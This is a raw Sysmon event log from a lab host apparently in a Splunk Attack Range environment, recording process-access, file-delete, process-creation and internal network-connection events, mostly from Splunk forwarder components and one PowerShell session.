18:08:28.332{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084015Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:28.332{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084014Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:28.332{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084013Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:28.332{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4D9C-613A-2990-03000000C801}6452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084012Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:28.332{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D9C-613A-2990-03000000C801}6452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084011Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:28.318{B81B27B7-4D9C-613A-2990-03000000C801}6452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084010Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:28.332{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C90574553E4C162BDD684237F8FE1BA6,SHA256=7C5F62D3DD36137CF35C1783755AC58BD82A19BB83EF81A06335B7A146DBCB55,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084031Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:29.485{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0070B1EAFD684E02B2D57D7A2F8A9EAE,SHA256=DC76E3FC6CB056A669D8AA8707ACDB89973C82977033798A74A007345CC555DA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084030Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:29.485{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B9B22E89EC0B38C66F9D09BD071D0B42,SHA256=2FB36CEE425F07EB002356561488FC84C695060EEEAED6A929BFC8A01903D28D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084029Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:29.353{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B813F4477168187483CC4FE4CBBFAFFB,SHA256=F0831B920E630C555A37CA24AAC3D01B8ABDA2627E24E90C93F3771B4A5CE231,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084032Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:30.368{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA7E48DE2ABC20B67B992CAB413D20F1,SHA256=B9EE8FCABB63BDC30B81C0EDE4EEC0271EE6ADBBB3472B267F0339A25182E1C1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084035Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:56.599{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56553-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084034Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:31.614{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8B08425AB6D2E9D9D2A195EE0ADB0295,SHA256=F9578B8C4B0E2183B0122CCF51B3630A7B5A3BEE6CD2F8F203BE9443D7E327D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084033Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:31.399{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FD9F936923A5388B398FDA6AF038404,SHA256=382EDD42AC3C19775C752EC4DFAAB6BBEAEBF541A7C22ABE37E071ADDBF2DA4E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084036Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:32.448{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89B59B7F2DD68E1BEF2451313EF4F381,SHA256=571A0654BE99ECB3D4695D7E7C96CB955282333FF918E4A94D80F5B0A705BAC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084037Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:33.449{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABC97BB2A0330BF4551D72EC6BDF55F8,SHA256=0530EBF1407ACB6CA77A2F95FC3FE78968994F46D89EE03CD016FC7D3D3DB830,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084039Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:34.464{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7E2AC3F79276252FC9BAB709E28E969,SHA256=18264511980869582167D977D480570F1DFCA8597C0D4C799D1209F488A07AAB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084038Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:58.263{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56554-false10.0.1.12-8000- 23542300x800000000000000035084040Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:35.479{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6017844D5E610472DF2BD67C4AA9FC6,SHA256=DDF270EF4E102A0C767F148952573F1F602784EFF77B58D215854B8654B93D5D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084042Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:36.509{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF82B739E1DE456BB69B7B5BF73B33DF,SHA256=7AEE83A5ECAE65CD177706E7633678346EC6725E92FE3CA11DBADA900F1B3C4A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084041Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:36.394{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=F797FA8A9F5B9765D9247D40D08D5DA8,SHA256=C6740D8C102F0985C9A0BB8E4F890B4E8B8B9DC992C207796C793CCBEDAB4D50,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084044Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:37.692{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B5944E59F30D7BE082F97492F6DF534,SHA256=932F7A56465ACD5CC110AABBE57488388D35D4B9A2E34D3F3D9C24C922273400,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084043Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:37.624{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E39C9D519FAD28CF21300D1C5A66EBB9,SHA256=DEC1790E7DED8F9DA0092EEC2C7F2C4F4009977E0B87DBF54EFB338019078E65,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084045Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:38.741{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6346C656D7B6F0EE6400BBA153248E4F,SHA256=1BC509C92832C720E02954A5568D60EA0191D166E0FC78F0795FAAAC548E2970,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084047Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:39.743{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=191089DCEF786028AAECF13351F35B43,SHA256=B77B71BECF42F22BD6775E79A40FF8FEB37588FB7A5A6C0286506471FF7C9161,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084046Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:02.609{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56555-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084049Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:40.758{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=365173F0694265CCFB81DC2FE3573D33,SHA256=F5F8D69EAA1E49E65828A96A31FE5BC62FD1576D8E532F2EBD089F18FC3852B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084048Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:04.076{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56556-false10.0.1.12-8000- 23542300x800000000000000035084050Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:41.803{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96A7D60E54CA71EAC6395C0A20EC6C4F,SHA256=A41B10F68BA67C82C2852413DBBE5A9207BB77525B21CF349EFF81CBC2A068BC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084051Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:42.818{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37F0334223889EA7C01FC2551D6BD7BD,SHA256=C3B07FD186B77E66C4C502B37B01C37E1D5DDF8ACFB57E4EDBCC50D9F4D7C87E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084062Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:43.839{B81B27B7-4DAB-613A-2B90-03000000C801}65205976C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035084061Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:43.839{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0E3D32A239EC7C49CB9E04EB3541C34,SHA256=9FA35CAEA24CD116A8181D5CDD8920B26370E2CAA8CCE5E66CC82814F45BFBCD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084060Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:43.639{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4DAB-613A-2B90-03000000C801}6520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084059Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:43.639{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084058Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:43.639{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084057Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:43.639{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084056Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:43.639{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084055Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:43.639{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4DAB-613A-2B90-03000000C801}6520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084054Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:43.639{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4DAB-613A-2B90-03000000C801}6520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084053Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:43.633{B81B27B7-4DAB-613A-2B90-03000000C801}6520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 